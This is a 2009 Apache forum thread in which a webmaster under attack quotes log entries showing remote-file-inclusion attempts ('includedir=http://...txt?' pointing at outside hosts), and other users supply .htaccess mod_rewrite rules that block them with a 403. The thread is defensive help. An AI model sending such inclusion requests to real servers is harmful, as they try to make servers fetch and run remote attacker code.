1. Home
  2. Forums Index
  3. Server Side / Apache Web Server 1:28 pm May 2, 2026

Forum Moderators: phranque

Message Too Old, No Replies

htaccess help

help to block nonexistent pages via htaccess

         

dgrand

7:30 pm on Mar 12, 2009 (gmt 0)

10+ Year Member



Long story short. Our main server is under 302 proxy hijacking attack. The attacking group has injected javascript and is trying to replace our search listing results in major search engines

In the log there tons of requests of such kind
GET /companies//ws/get_events.php?includedir=http://soomedomain.tld/images/copyright.txt?

GET /software//webcalendar/tools/send_reminders.php?includedir=http://someotherdomain.tdl/id1.txt?

The pages do not exist on our server. There are two things in common the request ending by [somefilename.txt?] We do not have any text files on the server except robots.txt. The second common thing is two forward slashes after an existing directory name.

Could anybody help us with a script to block such request via .htaccess?

we already blocked 500 IPs from compromized sites, so this is not an option. The are adding new sites as we speak.

Thank you!

DG

dgrand

7:43 pm on Mar 12, 2009 (gmt 0)

10+ Year Member



for some reason the second question mark was trunkated after the txt file when I first posted. Queries have filename.txt(two or four question marks)

jdMorgan

9:54 pm on Mar 12, 2009 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member



Something like this might be effective. 

Options +FollowSymLinks
RewriteEngine on
RewriteCond %{QUERY_STRING} ^includedir=http://[^/]+/([^.]+\.)+txt\?*$
RewriteRule .* - [F]

All requests with a query string starting with "includedir=" followed by a URL ending in ".txt" with zero or more trailing question marks will get a 403-Forbidden response from your server.

If you use a custom 403 error document, be sure that you exclude its URL from this rule by using an additional RewriteCond. Otherwise, you'll get an 'infinite' loop.

Jim

dgrand

10:23 pm on Mar 12, 2009 (gmt 0)

10+ Year Member



Works like a charm! thank you very much!

dgrand

10:32 pm on Mar 12, 2009 (gmt 0)

10+ Year Member



I actually used it like this, covering other types of requests

Options +FollowSymLinks
RewriteEngine on
RewriteCond %{QUERY_STRING} ^\.txt\?*$
RewriteRule .* - [F,L]

g1smd

11:19 pm on Mar 12, 2009 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



Your query string begins with a dot?

That's what your code says.

dgrand

11:35 pm on Mar 12, 2009 (gmt 0)

10+ Year Member



yes simply searching for ^.txt?^ Or may be there is a better solution, such as verifying if this document exists?

jdMorgan

1:06 am on Mar 13, 2009 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member



Your modified code shouldn't work, because you pattern says the query must begin with a literal period, followed by "txt", and then end with zero or more question marks. Remove the start anchor to fix it. 

Options +FollowSymLinks
RewriteEngine on
RewriteCond %{QUERY_STRING} [b]\.tx[/b]t\?*$
RewriteRule .* - [F,L]
 

Join The Conversation

Moderators and Top Contributors

Hot Threads This Week

  1. Home
  2. Forums Index
  3. Server Side / Apache Web Server 1:28 pm May 2, 2026